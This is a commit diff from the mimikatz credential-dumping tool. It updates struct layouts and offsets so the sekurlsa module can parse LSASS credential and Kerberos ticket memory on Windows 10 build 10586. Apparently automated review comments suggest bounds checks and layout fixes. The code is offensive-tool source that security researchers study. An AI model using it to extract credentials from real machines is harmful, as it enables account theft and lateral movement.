mimikatz & mimilib sekurlsa module ready for Windows 10 build 10586

Benjamin DELPY 2015-11-13 00:47:56 +01:00
parent 71015c7081
commit 1b130574ed
5 changed files with 14 additions and 10 deletions


@ -992,7 +992,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
kuhl_m_dpapi_oe_credential_add(sid, NULL, pPrimaryCreds10->isNtOwfPassword ? pPrimaryCreds10->NtOwfPassword : NULL, pPrimaryCreds10->isShaOwPassword ? pPrimaryCreds10->ShaOwPassword : NULL, NULL, NULL);
}
else
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT)));
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
@ -1164,7 +1164,7 @@ VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob)
kprintf(L"\n\t * LSA Isolated Data: %.*S", blob->typeSize, blob->data);
kprintf(L"\n\t Unk-Key : "); kull_m_string_wprintf_hex(blob->unkKeyData, 3*16, 0);
kprintf(L"\n\t Encrypted: "); kull_m_string_wprintf_hex(blob->data + blob->typeSize, blob->origSize, 0);
//kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
//kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
//kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0);
kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
kull_m_string_wprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); kprintf(L", 5:0x%x", blob->unk5);
}
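Review bot: In kuhl_m_sekurlsa_genericLsaIsoOutput, `blob->typeSize` and `blob->origSize` are used as lengths for the `%.*S` print and the hex dump without being compared with `blob->structSize`, although the diagnostic line now printed shows all three side by side. All three values come from the blob itself, so an inconsistent blob makes the dump read past the buffer that was copied. A guard before the first print, for example `if ((ULONGLONG) blob->typeSize + blob->origSize > blob->structSize) return;`, would bound it, assuming structSize covers the whole blob, which the hunk does not show. The unkKeyData dump also still hard-codes `3*16` while the unkData2 dump uses `sizeof(blob->unkData2)`; `sizeof(blob->unkKeyData)` would keep both tied to the struct. The function starts outside the hunk, and the same points apply to the second copy of this function in the section at -453.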


@ -183,7 +183,8 @@ typedef struct _LSAISO_DATA_BLOB {
DWORD unk3;
DWORD unk4;
BYTE unkKeyData[3*16];
BYTE unkEmpty[20];
BYTE unkData2[16];
DWORD unk5;
DWORD origSize;
BYTE data[ANYSIZE_ARRAY];
} LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB;
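Review bot: LSAISO_DATA_BLOB is declared in two headers (this section and the one at -470) and the same field change is applied by hand to both, so the two layouts can drift apart without any compiler diagnostic. `unkData2[16]` followed by `DWORD unk5` covers the same 20 bytes as `unkEmpty[20]`, so `origSize` and `data` appear to keep their offsets. A comment above the fields such as `// unkData2 + unk5 replace the former 20-byte unkEmpty; offsets of origSize/data unchanged` would record that intent in both copies. The struct starts outside the hunk, and which header is meant to be authoritative is not visible here.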


@ -401,6 +401,8 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 {
LSA_UNICODE_STRING Description;
LSA_UNICODE_STRING AltTargetDomainName;
LSA_UNICODE_STRING KDCServer; //?
DWORD unk10586_d;
PVOID unk10586_p;
PKERB_EXTERNAL_NAME ClientName;
PVOID name0;
ULONG TicketFlags;
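Review bot: `unk10586_d` and `unk10586_p` are inserted into KIWI_KERBEROS_INTERNAL_TICKET_6 without a comment, and every field from `ClientName` onward moves as a result. If this struct is also used for Windows 10 builds earlier than 10586, reads of those later fields would land on the wrong offsets. The hunk does not show how the struct is selected per build, so that is worth confirming. On 64-bit targets the `DWORD` followed by `PVOID` also introduces four bytes of implicit padding, so a comment such as `// build 10586 addition, going by the field names: DWORD, padding on x64, pointer` would make the layout explicit. The struct starts and ends outside the hunk.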


@ -470,7 +470,8 @@ typedef struct _LSAISO_DATA_BLOB {
DWORD unk3;
DWORD unk4;
BYTE unkKeyData[3*16];
BYTE unkEmpty[20];
BYTE unkData2[16];
DWORD unk5;
DWORD origSize;
BYTE data[ANYSIZE_ARRAY];
} LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB;


@ -294,7 +294,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
}
}
else
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT)));
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
@ -453,9 +453,9 @@ VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob)
dprintf("\n\t * LSA Isolated Data: %.*s", blob->typeSize, blob->data);
dprintf("\n\t Unk-Key : "); kull_m_string_dprintf_hex(blob->unkKeyData, 3*16, 0);
dprintf("\n\t Encrypted: "); kull_m_string_dprintf_hex(blob->data + blob->typeSize, blob->origSize, 0);
//kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
//kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
//kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0);
dprintf("\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
dprintf("\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
kull_m_string_dprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); dprintf(", 5:0x%x", blob->unk5);
}
void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, LPCSTR prefix)